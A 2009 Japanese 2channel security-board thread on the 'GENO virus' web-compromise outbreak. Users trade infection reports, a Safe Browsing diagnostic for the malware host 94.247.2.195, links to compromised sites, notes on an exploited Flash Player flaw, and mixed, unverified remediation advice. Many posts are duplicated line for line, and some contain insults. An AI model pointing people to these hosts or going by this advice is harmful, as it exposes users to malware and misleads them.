482 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:29:32
中学入学祝いにせがんだのがappleUplus
483 : ◆W07s5cWHb. :2009/04/09(木) 14:31:13
小学生の頃に友達がPC6001を買ってもらったのに触発して
親に駄々こねて買ってもらったのがSordのM5♪
親に駄々こねて買ってもらったのがSordのM5♪
484 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:32:37
馬鹿にされ、MSからもスルーされ、各業界からも屑扱い
悲しい日々を送っている糞OSのVISTA厨歓喜!
でもVISTAが大丈夫というのは都市伝説だったwww
悲しい日々を送っている糞OSのVISTA厨歓喜!
でもVISTAが大丈夫というのは都市伝説だったwww
485 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:33:38
XP豚涙拭けよ?>>484
486 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:35:46
XP使ってるゴミどもw
487 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:39:44
>>407
バスター2009入れてたけど感染したよorz
不正変更の監視がエクスプローラの書き換え要求を検知したけど
もうその時点では感染してやられてたわけだから後の祭り。
キャッシュに残ってた本体exeもスクリプトも感染後にチェックしてもスルーだった。
つーか毎回こんなこと書いてるな俺。
operaなら大丈夫?
orz
AMD64なら大丈夫?
orz
バスターはいってれば大丈夫?
orz
バスター2009入れてたけど感染したよorz
不正変更の監視がエクスプローラの書き換え要求を検知したけど
もうその時点では感染してやられてたわけだから後の祭り。
キャッシュに残ってた本体exeもスクリプトも感染後にチェックしてもスルーだった。
つーか毎回こんなこと書いてるな俺。
operaなら大丈夫?
orz
AMD64なら大丈夫?
orz
バスターはいってれば大丈夫?
orz
488 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:44:49
489 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:46:49
firefoxで94.247.2.195にアクセスしたらセーフブラウジングが遮断した
以下そこに表示された「このサイトがブロックされる理由」
セーフ ブラウジング
94.247.2.0 の診断ページ
94.247.2.0 の現在のステータス
現在のところ、このサイトは疑わしくないと認識されています。
Google による巡回テスト状況
このサイトで過去 90 日間に Google がテストした 272 ページのうち 0 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。
Google が最後にこのサイトを巡回したのは2009-04-07で、このサイトで不審なコンテンツが最後に検出されたのは2009-04-07です。
Malicious software includes 240 scripting exploit(s), 16 trojan(s), 5 exploit(s).
This site was hosted on 1 network(s) including AS12553.
有害な不正ソフトの感染を広げる媒介をしていたかどうか
過去 90 日に、94.247.2.0 は ultimathulelodge.com/, zavallis.com/, databpo.com/ を含む 4 サイトの感染媒体として機能していたようです。
不正なソフトウェアをホストしていたかどうか
はい、このサイトでは不正なソフトウェアのホスティングが過去 90 日の間に検知されています。serona.pe.kr/, hitzwallpaper.com/, firat.edu.tr/ を含む 7560 個のドメインを感染させています。
Updated 36 hours ago
以下そこに表示された「このサイトがブロックされる理由」
セーフ ブラウジング
94.247.2.0 の診断ページ
94.247.2.0 の現在のステータス
現在のところ、このサイトは疑わしくないと認識されています。
Google による巡回テスト状況
このサイトで過去 90 日間に Google がテストした 272 ページのうち 0 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。
Google が最後にこのサイトを巡回したのは2009-04-07で、このサイトで不審なコンテンツが最後に検出されたのは2009-04-07です。
Malicious software includes 240 scripting exploit(s), 16 trojan(s), 5 exploit(s).
This site was hosted on 1 network(s) including AS12553.
有害な不正ソフトの感染を広げる媒介をしていたかどうか
過去 90 日に、94.247.2.0 は ultimathulelodge.com/, zavallis.com/, databpo.com/ を含む 4 サイトの感染媒体として機能していたようです。
不正なソフトウェアをホストしていたかどうか
はい、このサイトでは不正なソフトウェアのホスティングが過去 90 日の間に検知されています。serona.pe.kr/, hitzwallpaper.com/, firat.edu.tr/ を含む 7560 個のドメインを感染させています。
Updated 36 hours ago
490 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:50:02
7560・・・
491 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:00:57
>7560 個のドメインを感染させています。
ちょっとwなにそれ
ちょっとwなにそれ
492 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:01:36
悪意あるウェブサイトが進化、セキュリティベンダーの目を盗む手口も
ttp://www.security-next.com/010092.html
ttp://www.security-next.com/010092.html
493 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:04:48
そろそろ騒動も下火になってきたな。
494 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:07:53
サイト乗っ取り→ゼロデイアタック→あぼん
序章にすぎん
序章にすぎん
495 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:09:16
某サイトの青板には今回のウイルス被害はないのか
496 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:10:44
497 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:12:56
ノーガードでもadobeも一切入れてない俺は完全セーフ。
ノーガードの俺にいつも文句言ってたおまいら涙目w
ノーガードの俺にいつも文句言ってたおまいら涙目w
498 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:14:50
499 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:14:52
282 : クレマチス・モンタナ(北海道) [] :2009/04/07(火) 21:43:42.14 ID:CWnPkqk+
flash playerについて試してみた。IE6/2k。
やっぱりこのswfは flash player 9.0.115.0 以前に存在する脆弱性を利用したもの。
9.0.115.0でswfを読み込んでみたが、実行ファイルがダウンロードされコマンドプロンプトが立ち上がる。
9.0.124.0 以上であれば何も起こらず、攻撃は失敗するようだ。
flash playerについて試してみた。IE6/2k。
やっぱりこのswfは flash player 9.0.115.0 以前に存在する脆弱性を利用したもの。
9.0.115.0でswfを読み込んでみたが、実行ファイルがダウンロードされコマンドプロンプトが立ち上がる。
9.0.124.0 以上であれば何も起こらず、攻撃は失敗するようだ。
500 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:17:53
何時亜種が出てもおかしくない状況で
「俺は○○○だから感染しない」とか言ってる奴は
危機意識が薄すぎるだろw
「俺は○○○だから感染しない」とか言ってる奴は
危機意識が薄すぎるだろw
501 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:18:43
502 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:21:11
>>500
主にν速民だな
主にν速民だな
503 : ◆W07s5cWHb. :2009/04/09(木) 15:22:51
>>502
ν速民でもおいらみたいな情報強者もちゃんといるんだけどなw
ν速民でもおいらみたいな情報強者もちゃんといるんだけどなw
504 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:24:18
だよなぁ・・・ここ数日は触れ始めたばかりのUbuntuLinuxに
火狐+addonでネット系は使ってるけどこれだって安心とは言えないでしょ?
火狐+addonでネット系は使ってるけどこれだって安心とは言えないでしょ?
505 : ◆W07s5cWHb. :2009/04/09(木) 15:26:56
>>504
今や、本当に安全なWeb閲覧環境なんてPC-DOSとWebBoyの組み合わせ位しかないと思うw
殆どのサイトが閲覧不可だけどなw
てか、発売元のIBMのサイトすらブラウズ出来ないと思う。試したこと無いけど。
今や、本当に安全なWeb閲覧環境なんてPC-DOSとWebBoyの組み合わせ位しかないと思うw
殆どのサイトが閲覧不可だけどなw
てか、発売元のIBMのサイトすらブラウズ出来ないと思う。試したこと無いけど。
506 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:28:23
7560…。社内に注意喚起しておこう。これは洒落にならん。
客先から問い合わせが殺到する前に手を打っておこう。
客先から問い合わせが殺到する前に手を打っておこう。
507 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:29:55
こりゃ、サイバーテロものだな
508 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:30:22
セキュ板でコテつける奴って変な奴しかいないよな
509 : ◆W07s5cWHb. :2009/04/09(木) 15:30:31
510 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:31:12
511 : ◆W07s5cWHb. :2009/04/09(木) 15:31:14
>>508
だから本当は酉使いたくないんだけど、この際仕方ない。
だから本当は酉使いたくないんだけど、この際仕方ない。
512 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:33:50
>>511
なにが仕方がないの?
なにが仕方がないの?
513 : ◆W07s5cWHb. :2009/04/09(木) 15:37:38
514 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:39:23
ID出ない板だからじゃね。見るほうも酉付けてもらったほうがいいわ。
515 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:41:41
むしろコテでまともなやつなんて
ほとんど見たことない
まぁ例外もあるけど
酉は付けてもらわないとむしろ困る
ほとんど見たことない
まぁ例外もあるけど
酉は付けてもらわないとむしろ困る
516 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:42:24
やたらComboFix、ComboFix言って
一時期いたSmitFraudFix無責任に進める奴、使う奴が出てきそうな感じw
一時期いたSmitFraudFix無責任に進める奴、使う奴が出てきそうな感じw
517 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:44:36
酉つけなくても発言内容が薄ら寒いからわかる
518 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:47:43
いつも通り殺伐としてきて安心した
519 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:48:18
ラトビアのほう、サーバ管理者にコンテンツ消されたかな
クッキーを食わせるJavaScriptも返ってこなくなった
代わりに「There is no site at this address!!」というテキストが
クッキーを食わせるJavaScriptも返ってこなくなった
代わりに「There is no site at this address!!」というテキストが
520 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:51:42
マルウェア配布サイトは大抵数日て消えるからな
521 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:52:43
>519
生きてるよ
生きてるよ
522 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:52:45
見る側のセキュリティ対策はもちろんだが、
サイト運営管理の側も改竄されないようにちゃんと対策しといてもらいたい。
検出未対応な強力ウィルスを使われたらどうにもならん。
サイト運営管理の側も改竄されないようにちゃんと対策しといてもらいたい。
検出未対応な強力ウィルスを使われたらどうにもならん。
523 : ◆W07s5cWHb. :2009/04/09(木) 15:56:26
524 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:57:02
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090225/325493/
ttp://www.ipa.go.jp/security/ciadr/vul/20090311-adobe.html
Flash Playerは10.0.22.87と9.0.159.0が脆弱性を修正した最新版とか
Adobe Readerは7.1.1と8.1.4と9.1.0が脆弱性を修正した最新版ですかね
ttp://www.ipa.go.jp/security/ciadr/vul/20090311-adobe.html
Flash Playerは10.0.22.87と9.0.159.0が脆弱性を修正した最新版とか
Adobe Readerは7.1.1と8.1.4と9.1.0が脆弱性を修正した最新版ですかね
525 :名無しさん@お腹いっぱい。:2009/04/09(木) 16:29:44
526 : ◆W07s5cWHb. :2009/04/09(木) 16:33:35
527 :名無しさん@お腹いっぱい。:2009/04/09(木) 16:39:16
528 :名無しさん@お腹いっぱい。:2009/04/09(木) 16:41:10
酉付けてるなら無駄話してないで早く全貌を解明して
対策と対処を明確にしたまえ。
対策と対処を明確にしたまえ。
529 :名無しさん@お腹いっぱい。:2009/04/09(木) 16:41:59
530 : ◆W07s5cWHb. :2009/04/09(木) 16:44:14
531 :名無しさん@お腹いっぱい。:2009/04/09(木) 16:46:49
>492
>527
>527
532 :名無しさん@お腹いっぱい。:2009/04/09(木) 16:52:44
【審議中】
_,,..,,,,_ _,,..,,,,_
_,,..,,,_/ ・ω・ヽ/・ω・ ヽ,..,,,,_
./ ・ω_,,..,,,,_ l _,,..,,,,_/ω・ ヽ
| / ・ヽ /・ ヽ l
`'ー--l ll l---‐´
`'ー---‐´`'ー---‐´
_,,..,,,,_ _,,..,,,,_
_,,..,,,_/ ・ω・ヽ/・ω・ ヽ,..,,,,_
./ ・ω_,,..,,,,_ l _,,..,,,,_/ω・ ヽ
| / ・ヽ /・ ヽ l
`'ー--l ll l---‐´
`'ー---‐´`'ー---‐´
533 : ◆N9P3SuvBPo :2009/04/09(木) 17:01:14
HijackThisやRSITのログにも現れないということだが、
SilentRunnersやKVRTやGMERのログにも現れないのか?
SilentRunnersやKVRTやGMERのログにも現れないのか?
534 :名無しさん@お腹いっぱい。:2009/04/09(木) 17:09:34
tp://internet.watch.impress.co.jp/cda/news/2009/04/09/23085.html
535 :名無しさん@お腹いっぱい。:2009/04/09(木) 17:14:43
とりあえずこんな感じにまとめてみたけど
なんか足らんとかわかりにくいわボケとかあったらいってね
http://www1.axfc.net/uploader/He/so/214784.zip
長文テキストなんでめんどい人はスルーで
なんか足らんとかわかりにくいわボケとかあったらいってね
http://www1.axfc.net/uploader/He/so/214784.zip
長文テキストなんでめんどい人はスルーで
536 :名無しさん@お腹いっぱい。:2009/04/09(木) 17:15:28
537 :名無しさん@お腹いっぱい。:2009/04/09(木) 17:20:56
ちょ、その結論ヤバスw
538 :名無しさん@お腹いっぱい。:2009/04/09(木) 17:25:56
> 各種ウィルス本体をInternetTempが展開される
日本語でOK
> chmファイルの脆弱性を利用しようとしている模様
これ確定してたっけ?
日本語でOK
> chmファイルの脆弱性を利用しようとしている模様
これ確定してたっけ?
539 :名無しさん@お腹いっぱい。:2009/04/09(木) 17:27:48
まじお役立ちツールサンクス
やっぱりわかりにくいんでサーバとクライアントわけます
>>538
指摘thx
コピペしてちょっと改変とかだからおかしいとこあるかもしんない
chmはどっかにあがってた気がするけど忘れた
確定じゃないかもしれんからやめとくか
>>538
指摘thx
コピペしてちょっと改変とかだからおかしいとこあるかもしんない
chmはどっかにあがってた気がするけど忘れた
確定じゃないかもしれんからやめとくか
541 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:03:36
とりあえず家族のPCのadobeReaderのJS切ってきた
説明するのに苦労したよ・・・・・・・
説明するのに苦労したよ・・・・・・・
542 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:07:48
マジびっくりした。起動したまま放置してたらPCがピロリッとか言うんで見てみた。
全てパッチ済みで踏んだXPのSP3なんだけどいつの間にかTR/Agent.caaj [trojan]が、
\System Volume Information\_restoreに潜り込んでた。
ここからexeを呼ぶということは他に仕組みが動いてるはず。やばい。ある日突然活動開始するかも。
全てパッチ済みで踏んだXPのSP3なんだけどいつの間にかTR/Agent.caaj [trojan]が、
\System Volume Information\_restoreに潜り込んでた。
ここからexeを呼ぶということは他に仕組みが動いてるはず。やばい。ある日突然活動開始するかも。
語尾とか言葉の修正と参考URL適当に追加して送るわ
545 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:26:19
で、うちバスターなんだけど
各社のウイルス対応状況はどうなの?
カスペ・ノートンはOK?
GENOが情報出さないから(情報出す能力がない?)
どんな事サイトにされたかウイルス仕掛けられたのかが判ってない状況で
各社に対応してもらってないのか
調べてると情報が色々あって判んなくなってきたわ
各社のウイルス対応状況はどうなの?
カスペ・ノートンはOK?
GENOが情報出さないから(情報出す能力がない?)
どんな事サイトにされたかウイルス仕掛けられたのかが判ってない状況で
各社に対応してもらってないのか
調べてると情報が色々あって判んなくなってきたわ
546 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:29:14
>>545
半年ROMってろ
半年ROMってろ
547 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:32:14
半年後には沈静化してるだろうがな
548 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:33:07
んじゃ、100年ROMってろ
549 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:34:55
前にexplore.exe改竄された時Dr.Webで修復出来たような・・・
550 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:38:34
ROMって判んなくなってきてるから聞いたのに。。。
100年ROMってマス
100年ROMってマス
551 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:39:04
//www.naxos.co.jp/
【お詫び】
2009年4月7日午前より、8日昼頃にかけまして、弊社サイト内で
障害が発生しておりましたが、現在は復旧致しております。
ご迷惑をおかけ致しましたことをお詫び申し上げます。
なお、上記期間中に弊社サイトをご覧になられた場合、
パソコンによっては、ウイルスに感染している可能性がございます。
お心当たりの方は、大変恐れ入りますが、お使いのパソコンの
ウイルスチェックや、ウイルスソフトの最新版へのアップデートなどの
ご作業をお願い申し上げます。
(2009年4月8日 15時30分 ナクソス・ジャパン株式会社)
【お詫び】
2009年4月7日午前より、8日昼頃にかけまして、弊社サイト内で
障害が発生しておりましたが、現在は復旧致しております。
ご迷惑をおかけ致しましたことをお詫び申し上げます。
なお、上記期間中に弊社サイトをご覧になられた場合、
パソコンによっては、ウイルスに感染している可能性がございます。
お心当たりの方は、大変恐れ入りますが、お使いのパソコンの
ウイルスチェックや、ウイルスソフトの最新版へのアップデートなどの
ご作業をお願い申し上げます。
(2009年4月8日 15時30分 ナクソス・ジャパン株式会社)
552 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:47:27
ウィルスソフト最新にしちゃらめえええええええええ
553 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:48:22
/)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
554 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:51:10
> ウイルスソフトの最新版へのアップデート
ダメだなこりゃ
ダメだなこりゃ
555 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:52:36
ソフト最新にして再起動であぼんですねわかります
556 : ◆W07s5cWHb. :2009/04/09(木) 18:53:52
あんちとうんちの違いに迷ってそのまま付けずにテキトーに書いた感じだなw
557 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:55:06
まあIIS5.0じゃこんなもんだろうな・・・
とりあえずJPCert/CC送信完了
とりあえずJPCert/CC送信完了
558 : ◆W07s5cWHb. :2009/04/09(木) 18:59:41
559 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:01:52
攻撃サイトとして報告されています!と火狐に怒られるんだが・・・
ttp://www.umax.net/
「Google が最後にこのサイトを巡回したのは2009-04-06で、
このサイトで不審なコンテンツが最後に検出されたのは2009-04-06です。」
だって。
ttp://www.umax.net/
「Google が最後にこのサイトを巡回したのは2009-04-06で、
このサイトで不審なコンテンツが最後に検出されたのは2009-04-06です。」
だって。
560 : ◆W07s5cWHb. :2009/04/09(木) 19:05:40
561 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:08:00
今sqlsodbc.chmのMD5を確認してみたが
F639AFDE02547603A3D3930EE4BF8C12 だった
まあ安全圏だな
F639AFDE02547603A3D3930EE4BF8C12 だった
まあ安全圏だな
562 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:12:45
563 : ◆W07s5cWHb. :2009/04/09(木) 19:15:50
>>562
ちなみにトップページしか見てないんで、そこんとこよろしこ。
UMAXの全てのコンテンツの現段階での安全性を保障している訳じゃないんで。
てか、若しかしてUMAXもGenoウィルス食らってて
書き換えられた部分を修正した後なのかも知れないな。
ちなみにトップページしか見てないんで、そこんとこよろしこ。
UMAXの全てのコンテンツの現段階での安全性を保障している訳じゃないんで。
てか、若しかしてUMAXもGenoウィルス食らってて
書き換えられた部分を修正した後なのかも知れないな。
564 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:16:48
感染したドライブのバックアップから感染ファイルを復元するためにリアルタイム検索を停めて
あれこれやってたらtmproxyがランタイムエラーで落ちたorz。
落ちるなよ…
再起動したらIPフレンドがIEの設定を変えようとしていると不正変更の監視に引っかかるし
またやられたかなぁ。
まだ復元してなかったんだけどなぁ。
今の所前回みたいな症状は何も出てないしcmdもregeditも動いてる。
netstatでもあやしい接続はない。
IPフレンドもハッシュはZIPから解凍したオリジナルと変わらない。
バスターによるウイルス検索もクイック検索では何も出てこない。
とりあえずこのままオンラインチェックをやって問題ないようなら様子見だな…
あれこれやってたらtmproxyがランタイムエラーで落ちたorz。
落ちるなよ…
再起動したらIPフレンドがIEの設定を変えようとしていると不正変更の監視に引っかかるし
またやられたかなぁ。
まだ復元してなかったんだけどなぁ。
今の所前回みたいな症状は何も出てないしcmdもregeditも動いてる。
netstatでもあやしい接続はない。
IPフレンドもハッシュはZIPから解凍したオリジナルと変わらない。
バスターによるウイルス検索もクイック検索では何も出てこない。
とりあえずこのままオンラインチェックをやって問題ないようなら様子見だな…
565 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:17:59
VISTAが守ってくれました
ありがとうVISTA
ありがとうVISTA
566 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:42:29
なんか自分語りとか雑談で連投してるやつがキチガイに成りすまされたら〜みたいなこといってるけど
お前だろうが他のキチガイだろうがこっちからしたら同じだってことに気づいてくれないもんかな
やっぱキチガイだから無理か
お前だろうが他のキチガイだろうがこっちからしたら同じだってことに気づいてくれないもんかな
やっぱキチガイだから無理か
567 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:46:55
な
お
や
お
や
568 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:50:46
清書して送信したバージョンうpっときます
http://www1.axfc.net/uploader/He/so/214849.zip
http://www1.axfc.net/uploader/He/so/214849.zip
569 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:55:52
570 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:58:53
なるほど。>>566が ◆W07s5cWHb.の言っていた
ウィルス並みの基地外か。
ウィルス並みの基地外か。
571 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:02:58
572 : ◆W07s5cWHb. :2009/04/09(木) 20:04:10
573 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:04:52
574 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:07:24
結局「GENOウィルス」って名称で確定したのか?
GENO涙目だな。
GENO涙目だな。
575 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:09:34
>>571
おつ
おつ
576 : ◆W07s5cWHb. :2009/04/09(木) 20:13:28
>>574
てか、特定のセキュリティ製品の定義ファイルで使われているからな。既に。
てか、特定のセキュリティ製品の定義ファイルで使われているからな。既に。
577 :KD125054108237.ppp-bb.dion.ne.jp.2ch.net:2009/04/09(木) 20:16:52
geno geno
578 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:17:19
579 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:21:19
>>577
入れた?
入れた?
580 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:23:38
581 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:23:40
まだぶっちゃけ何をするウィルスかは分かってないだろ・・
実は匿名でwindowsの欠陥を直してくれている正義ウィルスだったり
実は匿名でwindowsの欠陥を直してくれている正義ウィルスだったり
582 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:26:09
583 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:26:51
いや使用者に無断で何かするのは正義とは言えないだろww
584 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:28:17
585 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:28:32
>>568
なれないことはするもんじゃないねw
なれないことはするもんじゃないねw
586 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:31:47
587 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:35:12
おれの突撃フォルダにあるメールボムは上限1,000通らしいが
588 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:35:57
何、なんでこんな馴れ合いスレになってるんだ?w
589 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:36:28
590 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:36:29
GEBO
591 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:37:33
VMじゃうまく感染できないから力になれんのだよ
592 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:38:04
対策のまとめまだ〜
593 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:39:01
>>588
ν速民が流れ込んできた
ν速民が流れ込んできた
594 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:41:23
お前ら玄人面しててワロタw
595 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:43:33
596 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:45:21
>>595
晒したメアドは破棄するのが常識だぞ
晒したメアドは破棄するのが常識だぞ
597 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:48:03
>>595
新たなメアドと新たな名前で再送しとけ。
新たなメアドと新たな名前で再送しとけ。
598 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:48:15
http://crestronjapan.com/
ほかまだ直ってないんだけど、これ通報してもいいレベルだろ
ほかまだ直ってないんだけど、これ通報してもいいレベルだろ
599 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:02:19
すいません577です
裏に入れると書いてたのがあってやってみました(^_^;)
間違えたようですm(_ _)m
裏に入れると書いてたのがあってやってみました(^_^;)
間違えたようですm(_ _)m
600 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:04:44
601 : ◆W07s5cWHb. :2009/04/09(木) 21:11:37
ν速のスレ見てる奴は把握してると思うけど、ちと大きめなサイトが来たな。
**** 価格比較のECナビ Part43 ****
http://gimpo.2ch.net/test/read.cgi/point/1238752206/84
84 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/07(火) 12:26:50 ID:AHGC13lc0
今日の■□□□をクリックすると、カス7が木馬だ木馬だと騒ぐんだが
カスだから誤検知かなぁ
**** 価格比較のECナビ Part43 ****
http://gimpo.2ch.net/test/read.cgi/point/1238752206/84
84 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/07(火) 12:26:50 ID:AHGC13lc0
今日の■□□□をクリックすると、カス7が木馬だ木馬だと騒ぐんだが
カスだから誤検知かなぁ
602 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:13:45
>601
それmag-puppine.com/about/だろ?
それmag-puppine.com/about/だろ?
603 : ◆W07s5cWHb. :2009/04/09(木) 21:15:18
604 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:18:40
>>598
直リンすんなキモブタ
直リンすんなキモブタ
605 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:20:17
606 : ◆N9P3SuvBPo :2009/04/09(木) 21:20:31
607 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:22:59
いよいよ始まったか
608 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:24:04
609 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:26:29
まだ対応してないアンチウイルスソフトってあるんですか?
610 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:40:25
>>598
直リンすんなキモブタ
直リンすんなキモブタ
611 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:42:56
>>598
直リンすんなキモブタ
直リンすんなキモブタ
612 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:47:17
613 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:55:00
>>612
横から申し訳ないんだけど、本体はまだほとんど検知できないってマジ?
横から申し訳ないんだけど、本体はまだほとんど検知できないってマジ?
614 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:58:36
くそっ またフリーズした このウィルスめ・・・
買い物は全て激安通販でって思ってたのに情けない・・・
笑っちゃうよねっ 馬鹿みたいだけどさ・・・ 俺は
新品ノートPCが激安で売ってるショップがあるからって見に行っただけなのに・・・
正直・・・ 面食らっちゃって 動揺を隠すよう振舞うので精一杯だった・・・
俺は・・・ 本当は・・・ 悔しいですっ!!
買い物は全て激安通販でって思ってたのに情けない・・・
笑っちゃうよねっ 馬鹿みたいだけどさ・・・ 俺は
新品ノートPCが激安で売ってるショップがあるからって見に行っただけなのに・・・
正直・・・ 面食らっちゃって 動揺を隠すよう振舞うので精一杯だった・・・
俺は・・・ 本当は・・・ 悔しいですっ!!
615 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:59:03
先日の土曜日午前にGENOにアクセスして
ブラウザ(ニール)落ち。その後数回試すも同じ
その後、IEで試しても落ち。
Readerは起動せず。
AdobeReaderは9.1
flashは最新じゃなかったかも
OSはXPsp3
で各サイトでかかれいてる検証方法をいろいろ試したのですが
どれもヒットなし。
これって助かってるんですかね?
ブラウザ(ニール)落ち。その後数回試すも同じ
その後、IEで試しても落ち。
Readerは起動せず。
AdobeReaderは9.1
flashは最新じゃなかったかも
OSはXPsp3
で各サイトでかかれいてる検証方法をいろいろ試したのですが
どれもヒットなし。
これって助かってるんですかね?
616 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:05:33
再起動すれば、完全に分かるよ。
お勧めはしませんが。
お勧めはしませんが。
617 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:07:28
俺は土曜日午後一時頃にGENOにアクセスして
ブラウザ(ニール)全く変化無し IEで試しても変化無し
Readerは起動せず。
AdobeReaderは6.0
flashは不明
OSはMe
jsは常に切ってる
で各サイトでかかれいてる検証方法をいろいろ試したのですが
どれもヒットなし。
アンチウィルス オンラインウィルス アンチスパイウェアどれも検知せず
これって助かってるんですかね?
ブラウザ(ニール)全く変化無し IEで試しても変化無し
Readerは起動せず。
AdobeReaderは6.0
flashは不明
OSはMe
jsは常に切ってる
で各サイトでかかれいてる検証方法をいろいろ試したのですが
どれもヒットなし。
アンチウィルス オンラインウィルス アンチスパイウェアどれも検知せず
これって助かってるんですかね?
618 : ◆W07s5cWHb. :2009/04/09(木) 22:09:21
>>615
土曜日午前だと判断に窮するな。
ぶっちゃけ、その頃には既にgeno鯖が改ざんされていたと思われるんで。
とにかく、疑わしい場合は手間を惜しまずに可及的速やかにクリーンインストールかリカバリを行うべき。絶対に。
土曜日午前だと判断に窮するな。
ぶっちゃけ、その頃には既にgeno鯖が改ざんされていたと思われるんで。
